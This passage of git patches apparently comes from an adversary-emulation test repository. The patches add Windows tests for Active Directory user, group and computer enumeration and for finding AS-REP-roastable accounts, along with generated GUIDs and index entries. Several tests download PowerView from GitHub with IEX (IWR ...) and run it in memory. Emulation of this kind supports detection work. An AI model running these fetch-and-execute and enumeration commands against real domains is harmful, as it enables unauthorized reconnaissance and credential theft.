diff --git a/atomics/T1069.002/T1069.002.yaml b/atomics/T1069.002/T1069.002.yaml
index 8bc29220..80b9b6a3 100644
--- a/atomics/T1069.002/T1069.002.yaml
+++ b/atomics/T1069.002/T1069.002.yaml
@@ -133,3 +133,50 @@ atomic_tests:
     command: |
       #{adfind_path} -f (objectcategory=group)
     name: command_prompt
+- name: Enumerate Active Directory Groups with ADSISearcher
+  description: |
+    The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory.
+    Upon successful execution a listing of groups will output with their paths in AD.
+    Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      ([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne()
+- name: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
+  description: |
+    When successful, accounts that do not require kerberos pre-auth will be returned.
+    Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
+  supported_platforms:
+    - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Computer must be domain joined.
+    prereq_command: |
+      if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Write-Host Joining this computer to a domain must be done manually.
+  - description: |
+      Requires the Active Directory module for powershell to be installed.
+    prereq_command: |
+      if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
+- name: Get-DomainGroupMember with PowerView
+  description: |
+    Utilizing PowerView, run Get-DomainGroupMember to identify domain users. Upon execution, progress and info about groups within the domain being scanned will be displayed.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
+    name: powershell
\ No newline at end of file
diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml
index 54de57ff..aa1dd16a 100644
--- a/atomics/T1087.002/T1087.002.yaml
+++ b/atomics/T1087.002/T1087.002.yaml
@@ -214,3 +214,15 @@ atomic_tests:
     elevation_required: false
     command: |
       Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
+- name: Enumerate Active Directory Users with ADSISearcher
+  description: |
+    The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.
+    Upon successful execution a listing of users will output with their paths in AD.
+    Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      ([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
\ No newline at end of file
diff --git a/atomics/T1558.004/T1558.004.yaml b/atomics/T1558.004/T1558.004.yaml
index e427d061..52139328 100644
--- a/atomics/T1558.004/T1558.004.yaml
+++ b/atomics/T1558.004/T1558.004.yaml
@@ -46,3 +46,13 @@ atomic_tests:
       Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore
     name: powershell
     elevation_required: false
+- name: Get-DomainUser with PowerView
+  description: |
+    Utilizing PowerView, run Get-DomainUser to identify domain users. Upon execution, progress and info about users within the domain being scanned will be displayed.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
+    name: powershell
\ No newline at end of file

From b52281c4cda425d3e89150b397abb609c7362077 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Mon, 14 Mar 2022 16:43:54 +0000
Subject: [PATCH 26/83] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/T1018/T1018.yaml         | 1 +
 atomics/T1069.002/T1069.002.yaml | 3 +++
 atomics/T1087.002/T1087.002.yaml | 1 +
 atomics/T1558.004/T1558.004.yaml | 1 +
 atomics/used_guids.txt           | 6 ++++++
 5 files changed, 12 insertions(+)

diff --git a/atomics/T1018/T1018.yaml b/atomics/T1018/T1018.yaml
index 4f67a880..1f1212bb 100644
--- a/atomics/T1018/T1018.yaml
+++ b/atomics/T1018/T1018.yaml
@@ -311,6 +311,7 @@ atomic_tests:
     name: powershell
     elevation_required: false
 - name: Enumerate Active Directory Computers with ADSISearcher
+  auto_generated_guid: 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
   description: |
     The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
     Upon successful execution a listing of computers will output with their paths in AD.
diff --git a/atomics/T1069.002/T1069.002.yaml b/atomics/T1069.002/T1069.002.yaml
index 80b9b6a3..daebe0b7 100644
--- a/atomics/T1069.002/T1069.002.yaml
+++ b/atomics/T1069.002/T1069.002.yaml
@@ -134,6 +134,7 @@ atomic_tests:
       #{adfind_path} -f (objectcategory=group)
     name: command_prompt
 - name: Enumerate Active Directory Groups with ADSISearcher
+  auto_generated_guid: 9f4e344b-8434-41b3-85b1-d38f29d148d0
   description: |
     The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory.
     Upon successful execution a listing of groups will output with their paths in AD.
@@ -146,6 +147,7 @@ atomic_tests:
     command: |
       ([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne()
 - name: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
+  auto_generated_guid: 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8
   description: |
     When successful, accounts that do not require kerberos pre-auth will be returned.
     Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
@@ -171,6 +173,7 @@ atomic_tests:
     command: |
       Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
 - name: Get-DomainGroupMember with PowerView
+  auto_generated_guid: 46352f40-f283-4fe5-b56d-d9a71750e145
   description: |
     Utilizing PowerView, run Get-DomainGroupMember to identify domain users. Upon execution, progress and info about groups within the domain being scanned will be displayed.
   supported_platforms:
diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml
index aa1dd16a..fd3d98f1 100644
--- a/atomics/T1087.002/T1087.002.yaml
+++ b/atomics/T1087.002/T1087.002.yaml
@@ -215,6 +215,7 @@ atomic_tests:
     command: |
       Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
 - name: Enumerate Active Directory Users with ADSISearcher
+  auto_generated_guid: 02e8be5a-3065-4e54-8cc8-a14d138834d3
   description: |
     The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.
     Upon successful execution a listing of users will output with their paths in AD.
diff --git a/atomics/T1558.004/T1558.004.yaml b/atomics/T1558.004/T1558.004.yaml
index 52139328..165f58d1 100644
--- a/atomics/T1558.004/T1558.004.yaml
+++ b/atomics/T1558.004/T1558.004.yaml
@@ -47,6 +47,7 @@ atomic_tests:
     name: powershell
     elevation_required: false
 - name: Get-DomainUser with PowerView
+  auto_generated_guid: d6139549-7b72-4e48-9ea1-324fc9bdf88a
   description: |
     Utilizing PowerView, run Get-DomainUser to identify domain users. Upon execution, progress and info about users within the domain being scanned will be displayed.
   supported_platforms:
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 7a3a3bc4..80e8ed2f 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -884,3 +884,9 @@ e895677d-4f06-49ab-91b6-ae3742d0a2ba
 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9
 0b79c06f-c788-44a2-8630-d69051f1123d
 a27418de-bdce-4ebd-b655-38f04842bf0c
+64ede6ac-b57a-41c2-a7d1-32c6cd35397d
+9f4e344b-8434-41b3-85b1-d38f29d148d0
+43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8
+46352f40-f283-4fe5-b56d-d9a71750e145
+02e8be5a-3065-4e54-8cc8-a14d138834d3
+d6139549-7b72-4e48-9ea1-324fc9bdf88a

From 4c019a8936126d8e36acc4c2af4b6ffc777a2f39 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 14 Mar 2022 16:44:03 +0000
Subject: [PATCH 27/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |   6 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |   6 +
 atomics/Indexes/Indexes-Markdown/index.md     |   6 +
 .../Indexes/Indexes-Markdown/windows-index.md |   6 +
 atomics/Indexes/index.yaml                    | 103 ++++++++++++++++
 atomics/T1018/T1018.md                        |  32 +++++
 atomics/T1069.002/T1069.002.md                | 115 ++++++++++++++++++
 atomics/T1087.002/T1087.002.md                |  32 +++++
 atomics/T1558.004/T1558.004.md                |  31 +++++
 9 files changed, 337 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 0a6f7538..4e598d60 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -4,6 +4,7 @@ credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Lo
 credential-access,T1003.008,/etc/passwd and /etc/shadow,3,"Access /etc/{shadow,passwd} with a standard bin that's not cat",df1a55ae-019d-4120-bc35-94f4bc5c4b0a,bash
 credential-access,T1003.008,/etc/passwd and /etc/shadow,4,"Access /etc/{shadow,passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,bash
 credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
+credential-access,T1558.004,AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell
 credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
 credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
@@ -781,6 +782,7 @@ discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Ob
 discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
 discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
 discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
+discovery,T1087.002,Domain Account,11,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
 discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
 discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
 discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -789,6 +791,9 @@ discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain
 discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
 discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
 discovery,T1069.002,Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
+discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
+discovery,T1069.002,Domain Groups,10,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
+discovery,T1069.002,Domain Groups,11,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
 discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
 discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
 discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
@@ -857,6 +862,7 @@ discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbou
 discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
 discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
 discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
+discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
 discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 25300732..2a0ede05 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -1,5 +1,6 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
 credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
+credential-access,T1558.004,AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell
 credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
 credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
 credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
@@ -524,6 +525,7 @@ discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Ob
 discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
 discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
 discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
+discovery,T1087.002,Domain Account,11,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
 discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
 discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
 discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -532,6 +534,9 @@ discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain
 discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
 discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
 discovery,T1069.002,Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
+discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
+discovery,T1069.002,Domain Groups,10,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
+discovery,T1069.002,Domain Groups,11,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
 discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
 discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
 discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
@@ -573,6 +578,7 @@ discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,9
 discovery,T1018,Remote System Discovery,10,Adfind - Enumerate Active Directory Computer Objects,a889f5be-2d54-4050-bd05-884578748bb4,command_prompt
 discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory Domain Controller Objects,5838c31e-a0e2-4b9f-b60a-d79d2cb7995e,command_prompt
 discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
+discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
 discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 253ca895..0c8c1184 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -8,6 +8,7 @@
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1558.004 AS-REP Roasting](../../T1558.004/T1558.004.md)
   - Atomic Test #1: Rubeus asreproast [windows]
+  - Atomic Test #2: Get-DomainUser with PowerView [windows]
 - [T1552.003 Bash History](../../T1552.003/T1552.003.md)
   - Atomic Test #1: Search Through Bash History [linux, macos]
 - T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1282,6 +1283,7 @@
   - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
   - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
   - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
+  - Atomic Test #11: Enumerate Active Directory Users with ADSISearcher [windows]
 - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
   - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
   - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -1291,6 +1293,9 @@
   - Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
   - Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
   - Atomic Test #8: Adfind - Query Active Directory Groups [windows]
+  - Atomic Test #9: Enumerate Active Directory Groups with ADSISearcher [windows]
+  - Atomic Test #10: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
+  - Atomic Test #11: Get-DomainGroupMember with PowerView [windows]
 - [T1482 Domain Trust Discovery](../../T1482/T1482.md)
   - Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
   - Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
@@ -1374,6 +1379,7 @@
   - Atomic Test #13: Remote System Discovery - ip route [linux]
   - Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux]
   - Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
+  - Atomic Test #16: Enumerate Active Directory Computers with ADSISearcher [windows]
 - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
   - Atomic Test #1: Security Software Discovery [windows]
   - Atomic Test #2: Security Software Discovery - powershell [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 5a6fc548..9aca2c0d 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -3,6 +3,7 @@
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1558.004 AS-REP Roasting](../../T1558.004/T1558.004.md)
   - Atomic Test #1: Rubeus asreproast [windows]
+  - Atomic Test #2: Get-DomainUser with PowerView [windows]
 - T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
@@ -906,6 +907,7 @@
   - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
   - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
   - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
+  - Atomic Test #11: Enumerate Active Directory Users with ADSISearcher [windows]
 - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
   - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
   - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -915,6 +917,9 @@
   - Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
   - Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
   - Atomic Test #8: Adfind - Query Active Directory Groups [windows]
+  - Atomic Test #9: Enumerate Active Directory Groups with ADSISearcher [windows]
+  - Atomic Test #10: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
+  - Atomic Test #11: Get-DomainGroupMember with PowerView [windows]
 - [T1482 Domain Trust Discovery](../../T1482/T1482.md)
   - Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
   - Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
@@ -971,6 +976,7 @@
   - Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows]
   - Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows]
   - Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
+  - Atomic Test #16: Enumerate Active Directory Computers with ADSISearcher [windows]
 - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
   - Atomic Test #1: Security Software Discovery [windows]
   - Atomic Test #2: Security Software Discovery - powershell [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 66dce2ee..32ccfe39 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -341,6 +341,20 @@ credential-access:
 '
         name: powershell
         elevation_required: false
+    - name: Get-DomainUser with PowerView
+      auto_generated_guid: d6139549-7b72-4e48-9ea1-324fc9bdf88a
+      description: 'Utilizing PowerView, run Get-DomainUser to identify domain users.
+        Upon execution, progress and info about users within the domain being scanned
+        will be displayed.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
+        name: powershell
   T1552.003:
     technique:
       external_references:
@@ -55087,6 +55101,18 @@ discovery:
           -Server #{domain}
 
 '
+    - name: Enumerate Active Directory Users with ADSISearcher
+      auto_generated_guid: 02e8be5a-3065-4e54-8cc8-a14d138834d3
+      description: |
+        The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.
+        Upon successful execution a listing of users will output with their paths in AD.
+        Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: ([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
   T1069.002:
     technique:
       external_references:
@@ -55280,6 +55306,71 @@ discovery:
       executor:
         command: "#{adfind_path} -f (objectcategory=group)\n"
         name: command_prompt
+    - name: Enumerate Active Directory Groups with ADSISearcher
+      auto_generated_guid: 9f4e344b-8434-41b3-85b1-d38f29d148d0
+      description: |
+        The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory.
+        Upon successful execution a listing of groups will output with their paths in AD.
+        Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne()
+
+'
+    - name: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
+      auto_generated_guid: 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8
+      description: |
+        When successful, accounts that do not require kerberos pre-auth will be returned.
+        Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Computer must be domain joined.
+
+'
+        prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
+          {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Write-Host Joining this computer to a domain must be
+          done manually.
+
+'
+      - description: 'Requires the Active Directory module for powershell to be installed.
+
+'
+        prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit
+          0} else {exit 1}
+
+'
+        get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
+
+'
+      executor:
+        name: powershell
+        elevation_required: false
+        command: 'Get-ADUser -Filter ''useraccountcontrol -band 4194304'' -Properties
+          useraccountcontrol | Format-Table name
+
+'
+    - name: Get-DomainGroupMember with PowerView
+      auto_generated_guid: 46352f40-f283-4fe5-b56d-d9a71750e145
+      description: 'Utilizing PowerView, run Get-DomainGroupMember to identify domain
+        users. Upon execution, progress and info about groups within the domain being
+        scanned will be displayed.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
+        name: powershell
   T1482:
     technique:
       external_references:
@@ -57521,6 +57612,18 @@ discovery:
             Write-Host $Computer}
         name: powershell
         elevation_required: false
+    - name: Enumerate Active Directory Computers with ADSISearcher
+      auto_generated_guid: 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
+      description: |
+        The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
+        Upon successful execution a listing of computers will output with their paths in AD.
+        Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: ([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
   T1518.001:
     technique:
       id: attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384
diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md
index cb53f87d..3055bdc6 100644
--- a/atomics/T1018/T1018.md
+++ b/atomics/T1018/T1018.md
@@ -36,6 +36,8 @@ Specific to macOS, the <code>bonjour</code> protocol exists to discover addition
 
 - [Atomic Test #15 - Enumerate domain computers within Active Directory using DirectorySearcher](#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher)
 
